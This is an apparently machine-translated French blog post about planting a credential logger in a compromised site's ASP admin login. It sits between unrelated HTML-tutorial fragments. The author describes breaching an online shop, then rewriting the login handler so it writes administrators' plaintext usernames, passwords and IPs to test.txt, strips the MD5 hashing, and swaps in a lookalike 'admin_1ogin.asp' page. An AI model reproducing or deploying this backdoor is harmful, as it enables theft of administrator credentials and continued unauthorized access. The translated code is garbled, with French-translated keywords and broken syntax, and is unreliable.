Recommandé: Collection d'écriture de code HTML HTML est un langage de balisage hypertexte (HyperTextMarkupLanguage), également connu sous le nom de langage Web Web, est nécessaire pour le comprendre sur les pages Web. Bien qu'il existe de nombreux outils pour fabriquer des pages Web maintenant, comme Dreamwvear, FrontPage, etc., vous pouvez réellement créer de belles pages Web sans comprendre ces codes. . . Parce que le contenu HTML est nombreux, peu de gens sont prêts à écrire du code pour fabriquer des pages Web (efficacité INE), et la plupart d'entre eux utilisent
Dans une vérification de sécurité, j'ai en fait obtenu le boutique en ligne, mais j'ai également besoin que le travailleur social ait d'autres informations dans son adresse e-mail, donc je dois connaître ses habitudes.
La base de données a été téléchargée, mais le mot de passe MD5 n'a pas pu être décrypté. Hélas, il semble que vous ayez juste besoin d'enregistrer son mot de passe du compte d'administrateur de connexion!
Économisez la peine de vous débarrasser du problème!
Ce mot de passe est en fait important mais pas important.
Parce que beaucoup de gens aiment utiliser le même mot de passe. Même les détecteurs de sécurité comme moi sont inévitablement l'habitude d'utiliser le même mot de passe de compte.
Tout d'abord, consultez son code de connexion en arrière-plan
<%
Connexion DIM
SET LOGIN = NOUVEAU ADLOGIN
Login.exécuter
Classe Adlogin
Excommcs privés
Private Sub class_inialize
Définir Commcls = New CommonCLS
Excommcs.isipallow
Excommcs.checkinstall
Excomment.getConfigCache (*)
Sub-Sub
Sous-classe privée_terminée
Définir excomcls = rien
Sub-Sub
Sous-exécution publique
Faible action
Action = demande (action)
Sélectionnez l'action de cas
Case Checklogin
Chèque
Connexion du cas
Connexion
Cas d'autre
Se connecter
Fin de sélection
Sub-Sub
Sous-chèque privé
Dim adname, ADPWD, CHECKCODE
Adname = excomcl.g (trim (request (adname))))
ADPWD = MD5 (TRIM (demande (ADPWD)))
Checkcode = excomcl.g (request (checkcode))
Si Trim (CheckCode) <> Session (BcheckCode) et Application (SN & IsCheckCode) = Oui alors
Examccls.showmsg Le code de vérification est incorrect! , Application (SN & Blogurl) & admin_login.asp
Sous-marin de sortie
Terminer si
Si TRIM (ADNAME) = CSTR (application (SN & ADNAME)) et TRIM (ADPWD) = CSTR (application (SN & ADPWD)) alors
Réponse.cookies (md5 (sn))) (Adname) = Adname
Response.cookies (MD5 (SN)) (ADPWD) = ADPWD
Session (Adlogin) = MD5 (SN)
Excomment.getConfigCache (*)
Excommcl.getClassCache ()
Réponse.redirect (application (SN & Blogurl) & admin_index.asp)
Autre
Le compte ou le mot de passe excomcls.showmsg est faux, application (sn & blogurl) & admin_login.asp
Terminer si
Sub-Sub
Sous-connexion privée
Réponse.cookies (md5 (sn))) (adname) =
Réponse.cookies (md5 (sn))) (ADPWD) =
session.abandon ()
Examccls.showmsg a été déconnecté avec succès, Application (SN & Blogurl) & index.asp
Sub-Sub
Sous-login privé
%>
Regardez le code suivant
Adname = excomcl.g (trim (request (adname))))
ADPWD = MD5 (TRIM (demande (ADPWD)))
--- Le sens est très simple, donc je ne l'explique pas explicitement ici. Cela dépend principalement de MD5. Si le mot de passe est chiffré à l'aide de MD5, le mot de passe que nous avons enregistré sera inutile et il est toujours MD5. donc
J'ai donc pensé à une méthode de pêche. Son interface de connexion d'origine est
Sous-chèque privé
Dim adname, adpwd, checkcode, strlogtext, ip, ff
Adname = excomcl.g (trim (request (adname))))
ADPWD = (TRIM (demande (ADPWD)))
Checkcode = excomcl.g (request (checkcode))
strlogfile = test.txt
Ip = request (ip)
StrlogText = strlogtext & adname & ---- & adpwd & ----- ip: & ip & (reote_host)
set f = server.createObject (scripting.fileSystemObject)
SET FF = F.OPENEXTFILE (server.mapath (.) & / & strlogfile, 8, true, 0)
ff.WriteLine (Chr (13) + Chr (10) & StrlogText)
ff.close
définir ff = rien
Définir F = rien
Si Trim (CheckCode) <> Session (BcheckCode) et Application (SN & IsCheckCode) = Oui alors
Examccls.showmsg Le code de vérification est incorrect! , Application (SN & Blogurl) & admin_1ogin.asp
Sous-marin de sortie
Terminer si
Si TRIM (ADNAME) = CSTR (application (SN & ADNAME)) et TRIM (ADPWD) = CSTR (application (SN & ADPWD)) alors
Réponse.cookies (md5 (sn))) (Adname) = Adname
Réponse.cookies ((sn)) (ADPWD) = ADPWD
Session (Adlogin) = MD5 (SN)
Excomment.getConfigCache (*)
Excommcl.getClassCache ()
Réponse.redirect (application (SN & Blogurl) & admin_1ogin.asp)
Autre
Le compte ou le mot de passe excomcls.showmsg est faux, application (sn & blogurl) & admin_1ogin.asp
Terminer si
Sub-Sub
Voir ou non,
A = La page de connexion d'origine a maintenant été remplacée par une page de phishing
b = la page de connexion d'origine (admin_login.asp) est modifiée sur admin_1ogin.asp
Pourquoi?
Original: ADPWD = MD5 (TRIM (demande (ADPWD)))
Response.cookies (MD5 (SN)) (ADPWD) = ADPWD
Réviser
ADPWD = (TRIM (demande (ADPWD)))
Réponse.cookies ((sn)) (ADPWD) = ADPWD
Retirez MD5. . Cette méthode déroutante est utilisée depuis longtemps! . .
Pas de contenu technique. S'il vous plaît, ne riez pas de moi! Le mot de passe sera enregistré sur test.txt
Partager: FAITES SAILLANTS des éléments de tête Les documents HTML se composent de deux parties: tête (partie du thème, généralement invisible) et corps (la partie du corps, visible dans le navigateur). Avec la popularité des éditeurs Web visuels tels que FrontPage et Dreamweaver (DW), ce n'est plus un rêve de créer une page Web professionnelle sans comprendre HTML. Cependant, ces outils de création de page d'accueil ne peuvent pas être utilisés